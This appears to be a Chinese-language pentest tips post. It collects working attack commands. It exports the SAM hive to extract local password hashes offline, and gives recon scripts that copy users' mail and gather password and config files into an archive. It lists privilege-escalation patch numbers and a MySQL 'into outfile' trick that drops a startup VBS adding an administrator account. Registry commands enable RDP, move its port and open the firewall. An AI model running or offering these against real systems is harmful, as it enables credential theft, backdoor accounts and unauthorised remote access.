渗透测试技巧更新4

ethash 不免杀怎么获取本机hash。
首先导出注册表 regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"   （2000）
               reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg  （2003）
注意权限问题，一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问（界面登录的需要注意，system权限可以忽略）
接下来就简单了，把导出的注册表，down 到本机，修改注册表头导入本机，然后用抓去hash的工具抓本地用户就OK了
hash 抓完了记得把自己的账户密码改过来哦！
据我所知，某人是用这个方法虚拟机多次因为不知道密码而进不去！~

------------------------------------------

收集系统信息的脚本  
for window：

@echo off
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
net localgroup administrators
net user guest
net user administrator

echo #######at- with   atq#####
echo schtask /query

echo
echo ####task-list#############
tasklist /svc
echo
echo ####net-work infomation
ipconfig/all
route print
arp -a
netstat -anipconfig /displaydns
echo
echo #######service############
sc query type= service state= all
echo #######file-##############
cd \
tree -F
for linux：

#!/bin/bash

echo #######geting sysinfo####
echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
echo #######basic infomation##
cat /proc/meminfo
echo
cat /proc/cpuinfo
echo
rpm -qa 2>/dev/null
######stole the mail......######
cp -a /var/mail /tmp/getmail 2>/dev/null


echo 'u'r id is' `id`
echo ###atq&crontab#####
atq
crontab -l
echo #####about var#####
set

echo #####about network###
####this is then point in pentest,but i am a new bird,so u need to add some in it
cat /etc/hosts
hostname
ipconfig -a
arp -v
echo ########user####
cat /etc/passwd|grep -i sh

echo ######service####
chkconfig --list

for i in {oracle,mysql,tomcat,samba,apache,ftp}
cat /etc/passwd|grep -i $i
done

locate passwd >/tmp/password 2>/dev/null
sleep 5
locate password >>/tmp/password 2>/dev/null
sleep 5
locate conf >/tmp/sysconfig 2>dev/null
sleep 5
locate config >>/tmp/sysconfig 2>/dev/null
sleep 5

###maybe can use "tree /"###
echo ##packing up#########
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig

--------------------------------------------------------------------

tar打包            tar -cvf /home/public_html/*.tar /home/public_html/
                      --exclude= 排除文件*.gif   排除目录 /xx/xx/*
alzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar

提权先执行systeminfo
token 漏洞补丁号 KB956572
Churrasco          kb952004

---------------------------------------------------------------------

1. create table a (cmd text);
    
2. insert into a values ("set wshshell=createobject (""wscript.shell"")");
    
3. insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
    
4. insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");  
    
5. select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";

--------------------------------------------------------------

1.查询终端端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2.开启XP&2003终端服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3.更改终端端口为2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@  xpsp2res.dll,-22009 /f